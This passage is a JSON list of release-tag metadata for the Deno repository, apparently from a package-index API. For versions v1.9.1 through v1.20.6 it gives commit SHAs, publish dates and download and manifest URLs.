"sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","h